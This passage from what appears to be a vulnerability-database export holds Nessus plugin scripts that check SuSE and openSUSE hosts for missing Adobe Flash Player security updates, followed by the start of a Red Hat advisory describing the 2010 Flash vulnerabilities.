\"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n \n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n \n if (iver[0] == 9) info += '\\n Fixed version : 9.0.289\\n';\n else if (iver[0] == 10) info += '\\n Fixed version : 10.1.102.64\\n';\n }\n else if (\n (\"Chrome\" >< variant) && (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 1 ||\n (\n iver[1] == 1 &&\n (\n iver[2] < 103 ||\n (iver[2] == 103 && iver[3] < 19)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n\n info += '\\n Product: Browser Plugin (for Google Chrome)';\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver ;\n info += '\\n Fixed version : 10.1.103.19 (as included with Google Chrome 7.0.517.44)\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:info);\n else\n security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:10:34", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : flash-player (SAT Patch Numbers 3475 / 3477)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2010-12-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/50904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50904);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : flash-player (SAT Patch Numbers 3475 / 3477)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3638.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3641.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3642.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3643.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3644.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3645.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3646.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3647.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3648.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3649.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3650.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3651.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3652.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3654.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3976.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3475 / 3477 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"flash-player-10.1.102.64-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"flash-player-10.1.102.64-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:11", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976", "edition": 23, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-3474)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_3_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/75493", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-3474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75493);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-3474)\");\n script_summary(english:\"Check for the flash-player-3474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"flash-player-10.1.102.64-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:41", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976", "edition": 23, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-3474)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2011-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_2_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/53718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-3474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53718);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-3474)\");\n script_summary(english:\"Check for the flash-player-3474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"flash-player-10.1.102.64-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:18", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976", "edition": 23, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-3474)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2011-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_1_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/53658", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-3474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53658);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-3474)\");\n script_summary(english:\"Check for the flash-player-3474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"flash-player-10.1.102.64-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-05-29T14:34:09", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3636", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644", "CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-26, listed\nin the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644,\nCVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\nCVE-2010-3650, CVE-2010-3652, CVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain server\nencodings could lead to a bypass of cross-domain policy file restrictions,\npossibly leading to cross-domain information disclosure. (CVE-2010-3636)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 9.0.289.0.\n", "modified": "2017-07-22T04:32:45", "published": "2010-11-08T05:00:00", "id": "RHSA-2010:0834", "href": "https://access.redhat.com/errata/RHSA-2010:0834", "type": "redhat", "title": "(RHSA-2010:0834) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:44", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3636", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644", 